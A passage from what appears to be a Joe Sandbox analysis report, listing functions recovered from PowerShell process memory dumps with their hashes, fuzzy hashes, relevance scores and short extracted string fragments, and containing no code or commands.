                                                                                  • Instruction ID: d6a6e71de060d383465a78c80cd3972a42a6220bad223a0c042cb2ce85d878f2
                                                                                  • Opcode Fuzzy Hash: d63afd334a41556fe7e08610c861da89389d725c10b809ead7bf55f9b6179342
                                                                                  • Instruction Fuzzy Hash: 8A31B032D1EA865FF3A5A7281825378A6E1FF09691F9801BAD44DD31D2EE0C7814825A
                                                                                  Function 00007FF848F13945 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2599908602.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: 1d263df139ee799e0221237225f3f4c5236a0ef0a202e971a2d53809691abd9b
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: 2501677111CB0C4FDB44EF0CE451AA5B7E0FB95364F50056EE58AC3695D736E881CB45

                                                                                  Executed Functions

                                                                                  Function 04E7E928 Relevance: .3, Instructions: 281COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 94be41b7e1e48891ca18f33fc6f0e602a8c66dd99f0cdbad246dc4b1c86954e1
                                                                                  • Instruction ID: ccfe0cf5210d410c3b84cc1d3ce1ad658206e67ee69ca7f33c9b323262a03c81
                                                                                  • Opcode Fuzzy Hash: 94be41b7e1e48891ca18f33fc6f0e602a8c66dd99f0cdbad246dc4b1c86954e1
                                                                                  • Instruction Fuzzy Hash: 6DB15E70E00249DFDB14CFADC88579DBBF2BF88328F149569D815E7254EB74A841CB81
                                                                                  Function 04E7F1F8 Relevance: .3, Instructions: 266COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8adc18eb5a62d231b4c6a8dc519391c9302470973d965465c3901380bda277a3
                                                                                  • Instruction ID: 8f6a2fbede19fc496b3fc9b7f33bb771712bfd2a78a8ba33037bed44b42ce039
                                                                                  • Opcode Fuzzy Hash: 8adc18eb5a62d231b4c6a8dc519391c9302470973d965465c3901380bda277a3
                                                                                  • Instruction Fuzzy Hash: 8DB15F70E00209DFDB10CFA9D9857EDBBF2BF88328F149529E815E7254EB74A845CB81
                                                                                  Function 07A5B225 Relevance: 22.0, Strings: 17, Instructions: 704COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$x.]k$x.]k$x.]k$-]k$-]k
                                                                                  • API String ID: 0-184526528
                                                                                  • Opcode ID: b9c173078eef6b4d2ab7a763dfb3e1b94a7d95487c4d4086562a8eaafeacbfd6
                                                                                  • Instruction ID: ecb942d91d5e4e24ac7e563e514f133150d99cd906ab0963713a29ee5ae96f6d
                                                                                  • Opcode Fuzzy Hash: b9c173078eef6b4d2ab7a763dfb3e1b94a7d95487c4d4086562a8eaafeacbfd6
                                                                                  • Instruction Fuzzy Hash: C26282B0A402198FDB24DB68C950BEEBBB2FF84700F1084D9D9096B355CB75AE85CF95
                                                                                  Function 07A54770 Relevance: 15.9, Strings: 12, Instructions: 934COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll$(fll$(fll$(fll$(fll$84jl$84jl$tPjq$tPjq
                                                                                  • API String ID: 0-1637198715
                                                                                  • Opcode ID: 723cfd6f6b639f50037e1a6ae0d60467c18c61ab92c0f7008decabdd2c7f0147
                                                                                  • Instruction ID: 8e0d4a555869bbaf4506698dee2709aaacf8cb2c5139acd7b392360f48328e7f
                                                                                  • Opcode Fuzzy Hash: 723cfd6f6b639f50037e1a6ae0d60467c18c61ab92c0f7008decabdd2c7f0147
                                                                                  • Instruction Fuzzy Hash: 9A828DB4B00205CFDB14CF98C551AAABBB2EF89304F25C069E8199F355CB76EC46CB95
                                                                                  Function 07A5E150 Relevance: 15.5, Strings: 12, Instructions: 524COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-159672019
                                                                                  • Opcode ID: 2ccd94d0713d6300c74f64c2eb0eb22344f5880595a2167119ad5f97459ee0e1
                                                                                  • Instruction ID: 3030eef522bfa7b411aebc5e4edc8346e6a13353bd28740c19b8a1171938f89d
                                                                                  • Opcode Fuzzy Hash: 2ccd94d0713d6300c74f64c2eb0eb22344f5880595a2167119ad5f97459ee0e1
                                                                                  • Instruction Fuzzy Hash: 9602B2B1B042158FDB14CB68C550AAABBF6EF89310F14806ADC15AF355DB36DE41CBA2
                                                                                  Function 07A52808 Relevance: 15.5, Strings: 12, Instructions: 487COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-3488220606
                                                                                  • Opcode ID: fea846c9e7403deaf2d4f5d0d46ca2dfb5e96eb875392e7ff9c54535959c71f9
                                                                                  • Instruction ID: 09de9ea64b9e9396843e8b98102a34eeab6555464ab363e4d7612576dc72eec5
                                                                                  • Opcode Fuzzy Hash: fea846c9e7403deaf2d4f5d0d46ca2dfb5e96eb875392e7ff9c54535959c71f9
                                                                                  • Instruction Fuzzy Hash: D6F1F7F1704206DFCB258F6898507BABBB6FFC6211F18806ADC258B2D6DB35C945C7A1
                                                                                  Function 07A57090 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$x.]k$-]k
                                                                                  • API String ID: 0-3953135750
                                                                                  • Opcode ID: d15454750a40562cdde44a8530cf8c81f37446d7f6edb7e0851905237e8c976a
                                                                                  • Instruction ID: a043d55148fd51ecdb5d2d72a369c158aaad39032c9f296778b17a9e9b134710
                                                                                  • Opcode Fuzzy Hash: d15454750a40562cdde44a8530cf8c81f37446d7f6edb7e0851905237e8c976a
                                                                                  • Instruction Fuzzy Hash: ABD18BB4B402059FD718DB68C551AAEBBB3EFC8310F218429D8116F395CB76DC42CBA6
                                                                                  Function 07A55E67 Relevance: 10.3, Strings: 8, Instructions: 310COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$x.]k$-]k
                                                                                  • API String ID: 0-3953135750
                                                                                  • Opcode ID: 65a8e2ff582c2ed0f2dc097d6b95383308a36fbceff151736474159faf476d6b
                                                                                  • Instruction ID: 9fc5f92cbadd657b47b497e907261b6a3891ada4cacf7c4a9a153976611e2149
                                                                                  • Opcode Fuzzy Hash: 65a8e2ff582c2ed0f2dc097d6b95383308a36fbceff151736474159faf476d6b
                                                                                  • Instruction Fuzzy Hash: 02D191B4B00225DFDB54DB58C950BAABBB2EF84700F1084A9D9086F395CB75DD86CF92
                                                                                  Function 07A56C58 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll$(fll$(fll$(fll$(fll
                                                                                  • API String ID: 0-3628354984
                                                                                  • Opcode ID: 9d6b0bdaff907422011060b623b6acfa7df16776b7cd4fa9bcb94869b4fe9237
                                                                                  • Instruction ID: 4be99eb34fb8ef4e5bc207643b82a4b96ebd7cc1e5c48af0fc6ea0aa8a40248f
                                                                                  • Opcode Fuzzy Hash: 9d6b0bdaff907422011060b623b6acfa7df16776b7cd4fa9bcb94869b4fe9237
                                                                                  • Instruction Fuzzy Hash: 46C19EB1F01205CBCB24CF58C550A6ABBF6EFC9B04F548929DC256B744CA32EC46CB96
                                                                                  Function 07A50638 Relevance: 9.2, Strings: 7, Instructions: 479COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$$jq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-2665671438
                                                                                  • Opcode ID: 71c43397bcc84f3e2d49e332c4a83321c766bf26df177407e0a6e2719825bf25
                                                                                  • Instruction ID: 333b243faf340b3d677d474ee7f172b2956f2c457022401c7197cd0d7f3f8a74
                                                                                  • Opcode Fuzzy Hash: 71c43397bcc84f3e2d49e332c4a83321c766bf26df177407e0a6e2719825bf25
                                                                                  • Instruction Fuzzy Hash: E6F133B1704216DFDB158B7898506BBBBB6EFC2310F18847BDC25CB256DA35C841CBA2
                                                                                  Function 07A562F3 Relevance: 9.1, Strings: 7, Instructions: 387COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$4'jq$4'jq$x.]k$x.]k$-]k
                                                                                  • API String ID: 0-3537374998
                                                                                  • Opcode ID: 1a6333d8b938c5aaffba10ba9522b67ecb207a58de45398a5f1054b98ba6deb6
                                                                                  • Instruction ID: d1d5339b54e37538a06046adf24f21df3b71ea7913c771e74a360c756ca005d1
                                                                                  • Opcode Fuzzy Hash: 1a6333d8b938c5aaffba10ba9522b67ecb207a58de45398a5f1054b98ba6deb6
                                                                                  • Instruction Fuzzy Hash: 66F1AFB4B402159FDB24DB28C951BAABBB3EF84704F10C4A9D8096F395CB759D82CF52
                                                                                  Function 07A5C659 Relevance: 7.9, Strings: 6, Instructions: 397COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$4'jq$4'jq$x.]k$x.]k
                                                                                  • API String ID: 0-3790084553
                                                                                  • Opcode ID: 06b6d66b4619ebe5663fbce18ce1b849a2f5851be79ee9bdabda6a88f121f7f2
                                                                                  • Instruction ID: 7517008191e27f82aac865cb09675db20649ade2b7e0147dd7ad156b9fa7c073
                                                                                  • Opcode Fuzzy Hash: 06b6d66b4619ebe5663fbce18ce1b849a2f5851be79ee9bdabda6a88f121f7f2
                                                                                  • Instruction Fuzzy Hash: A00262B4A40215DFDB14DB28C990BEEBBB2EF84304F1081E9D9096B355CB75AE81CF95
                                                                                  Function 07A5B948 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$4'jq$4'jq$x.]k$x.]k$-]k
                                                                                  • API String ID: 0-4201586509
                                                                                  • Opcode ID: be4d99fdbe89845a7c8437432715b71f00b09c1eaac59acfc68a3882a79b6f2e
                                                                                  • Instruction ID: 2c707e2e1216ada611c40b3456970996c4ec911a6de41f29530fd6ada9dacdf5
                                                                                  • Opcode Fuzzy Hash: be4d99fdbe89845a7c8437432715b71f00b09c1eaac59acfc68a3882a79b6f2e
                                                                                  • Instruction Fuzzy Hash: 84E1A3B0B402149FD724DB28C954BAE7BB3EF84700F108499D9096F396CB75EE828F95
                                                                                  Function 07A554D8 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll$x.]k
                                                                                  • API String ID: 0-2124473407
                                                                                  • Opcode ID: 1cea349359533840918242d228e3e66f6830cde187f2626a5b44076277786af0
                                                                                  • Instruction ID: 15df517cea0e31f99931b09049d46ca7a8bfbe5721cff5959632788cd7e7a480
                                                                                  • Opcode Fuzzy Hash: 1cea349359533840918242d228e3e66f6830cde187f2626a5b44076277786af0
                                                                                  • Instruction Fuzzy Hash: 38B16CB0F002049FD714DB68C555BAEBBE3EF88300F258469E8156B755CB76EC41CBAA
                                                                                  Function 07A57070 Relevance: 6.5, Strings: 5, Instructions: 271COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$x.]k$-]k
                                                                                  • API String ID: 0-1476186098
                                                                                  • Opcode ID: 611a4fae7eae38b7f2c305386831109a55966b4b2cc7f14627e2d360d0d50b80
                                                                                  • Instruction ID: 04c58d92809dc7d7d090fd1418e32eb7a749d6d16fbe91c43edf2a236d73b42f
                                                                                  • Opcode Fuzzy Hash: 611a4fae7eae38b7f2c305386831109a55966b4b2cc7f14627e2d360d0d50b80
                                                                                  • Instruction Fuzzy Hash: 72B17AB4A002059FDB18DF68C940AAABBB2EFC8314F158419D8157F355CB76E846CFA2
                                                                                  Function 074903F0 Relevance: 5.7, Strings: 4, Instructions: 653COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2409471358.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq
                                                                                  • API String ID: 0-4000621977
                                                                                  • Opcode ID: df0f3c0410aab1d47bced4dad5c81bcbc1223327c26279f5a66d0893134490c4
                                                                                  • Instruction ID: 9e88f9a788601044ededf202dc727b5a1d44126734473d29c05056a705a3c08a
                                                                                  • Opcode Fuzzy Hash: df0f3c0410aab1d47bced4dad5c81bcbc1223327c26279f5a66d0893134490c4
                                                                                  • Instruction Fuzzy Hash: 832213B17042179FCF159A6888116BBBFA6EFC2220F1484BBD505CB3A1DB75CD42C7A2
                                                                                  Function 07A56C52 Relevance: 5.3, Strings: 4, Instructions: 252COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll
                                                                                  • API String ID: 0-2347424031
                                                                                  • Opcode ID: b6a7804fc457e831c55c883b4b87c3bb47183fc2fc5797f4cb0ffc7d302e2267
                                                                                  • Instruction ID: 9cccc7a079a9502a58155c75bfcdc7271b4b5b1347304bd330dd7f45e739bd6d
                                                                                  • Opcode Fuzzy Hash: b6a7804fc457e831c55c883b4b87c3bb47183fc2fc5797f4cb0ffc7d302e2267
                                                                                  • Instruction Fuzzy Hash: 3EA17DB6E01205DBDB24CF58C540A6EF7B2FF89B14F54892EEC256B704C772A846CB91
                                                                                  Function 04E7B238 Relevance: 4.3, Strings: 3, Instructions: 531COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Hnq$$jq$$jq
                                                                                  • API String ID: 0-266315406
                                                                                  • Opcode ID: ae64c90292abd858b9da41ef9bb34bf51278a963d1788506ed468dd36f1b04f2
                                                                                  • Instruction ID: 280dae0f2f3dd5b373a50009d3be712dd30ea5fad4c1fd9eccf1eafb37239bfd
                                                                                  • Opcode Fuzzy Hash: ae64c90292abd858b9da41ef9bb34bf51278a963d1788506ed468dd36f1b04f2
                                                                                  • Instruction Fuzzy Hash: 6B227134B002249FCB25EF24D854AAEB7B6BF89315F1444E9D509AB365CF39AD81CF80
                                                                                  Function 07A55125 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll
                                                                                  • API String ID: 0-1022118942
                                                                                  • Opcode ID: 015b6ec935a9bf9812ea89f6615255e7d56b3bec80eba80486e8ffdea272a4d8
                                                                                  • Instruction ID: 6100feb8f97c7759e546d213261a81b91b470425128b1440b9a8d76e9511d388
                                                                                  • Opcode Fuzzy Hash: 015b6ec935a9bf9812ea89f6615255e7d56b3bec80eba80486e8ffdea272a4d8
                                                                                  • Instruction Fuzzy Hash: 88125CB4A00205DFDB14CF98C550AAABBB2EF88304F25C059E9299F755CB72EC46CF51
                                                                                  Function 07A554B0 Relevance: 4.0, Strings: 3, Instructions: 254COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$x.]k
                                                                                  • API String ID: 0-3511750101
                                                                                  • Opcode ID: 2f53cee03631d72e00f3d579cf3d2a69435692345a13ca1de286483267a9017f
                                                                                  • Instruction ID: e6827cc9fa0003c0b5d9dda7abc435c1c13515d05651f2883ade2a1a2efbfde9
                                                                                  • Opcode Fuzzy Hash: 2f53cee03631d72e00f3d579cf3d2a69435692345a13ca1de286483267a9017f
                                                                                  • Instruction Fuzzy Hash: 53A159B0E00201DFD714CB98C545BAEBBF3EF89304F25856AE8256B651CB76E841CF66
                                                                                  Function 07A52F63 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 84jl$tPjq
                                                                                  • API String ID: 0-640132433
                                                                                  • Opcode ID: 6e52deb5e9a7d495add579a4b3d99c2286c90a46a28cb519394017edb5b3d72b
                                                                                  • Instruction ID: 60884e6e02fda8200b12b4414285d143f3a0bd000ed6ffe2baea291ef7b8cfa2
                                                                                  • Opcode Fuzzy Hash: 6e52deb5e9a7d495add579a4b3d99c2286c90a46a28cb519394017edb5b3d72b
                                                                                  • Instruction Fuzzy Hash: ED51147060A3819FCB128B64D954A66FFB1BFC6214F19C0EBD8588F2A7C6358C06C761
                                                                                  Function 07A50618 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $jq$$jq
                                                                                  • API String ID: 0-3720491408
                                                                                  • Opcode ID: 0dbdaad2f100daf67fe5422688bbd8432393e048e09d90c9cc0d8ea5720486ba
                                                                                  • Instruction ID: d70c6a633280261460a26e0177865ee7f699660d11ba8120578b97ba65a4e992
                                                                                  • Opcode Fuzzy Hash: 0dbdaad2f100daf67fe5422688bbd8432393e048e09d90c9cc0d8ea5720486ba
                                                                                  • Instruction Fuzzy Hash: BF11D3B5309346DFD7158B24C9409A3BBB5EFC2314B1D82ABDD148B992D7B2D804CB63
                                                                                  Function 07A574B6 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x.]k
                                                                                  • API String ID: 0-1751754572
                                                                                  • Opcode ID: f6567b1e912cbf9bb452dd37dfd2d491d21c8ec9e64bf216ad82794f167a456c
                                                                                  • Instruction ID: 73307590f199dbb3e589def3b65920b77103b1e0d46e1d57b857126f4c467d88
                                                                                  • Opcode Fuzzy Hash: f6567b1e912cbf9bb452dd37dfd2d491d21c8ec9e64bf216ad82794f167a456c
                                                                                  • Instruction Fuzzy Hash: FC31B574B50214AFE704A768C955BBF7AA3EFC4304F108419E9016F395CF7A9C428FA6
                                                                                  Function 07A5E146 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq
                                                                                  • API String ID: 0-3676250632
                                                                                  • Opcode ID: e4fbdff40d647b9a76a4656c900efe6371003f9e27b4bd8b9b06ed277b0decb6
                                                                                  • Instruction ID: 355334ad8f44aa51130bc349cedebde056d2b8ed24e8eb44d827d316407ceda7
                                                                                  • Opcode Fuzzy Hash: e4fbdff40d647b9a76a4656c900efe6371003f9e27b4bd8b9b06ed277b0decb6
                                                                                  • Instruction Fuzzy Hash: 292135F0B082129BDF244B2484013BD77B6EBD0650F24406DDC35EF288EB7A8A41C7B2
                                                                                  Function 04E73670 Relevance: .3, Instructions: 309COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1da2e960a1a286ab31cb4ce25921e7abcfa0713452b1353678da0bcd6c988407
                                                                                  • Instruction ID: 68a3ad68be8ae9118dd6031fcca8bdd6dc3af84fbcef756a2240ff90a0e3102d
                                                                                  • Opcode Fuzzy Hash: 1da2e960a1a286ab31cb4ce25921e7abcfa0713452b1353678da0bcd6c988407
                                                                                  • Instruction Fuzzy Hash: 81D12874A012499FDB45CFA8D584A9DFBB2FF88324F248559E804AB366C735ED81CF90
                                                                                  Function 04E7E922 Relevance: .3, Instructions: 274COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 140e8a13352dd91f4f691d55c6972f95b98ef7734c987ba471f1f663db4be4ad
                                                                                  • Instruction ID: 8ec47cc98e1b3bf35c51ec72c75862bb81aa34a1a1dd3781f9a0e49459c31b2f
                                                                                  • Opcode Fuzzy Hash: 140e8a13352dd91f4f691d55c6972f95b98ef7734c987ba471f1f663db4be4ad
                                                                                  • Instruction Fuzzy Hash: 09B14C70E00249DFDB10CFADC9857DDBBF2BF88328F149169E815AB254EB74A845CB81
                                                                                  Function 04E78D38 Relevance: .3, Instructions: 266COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
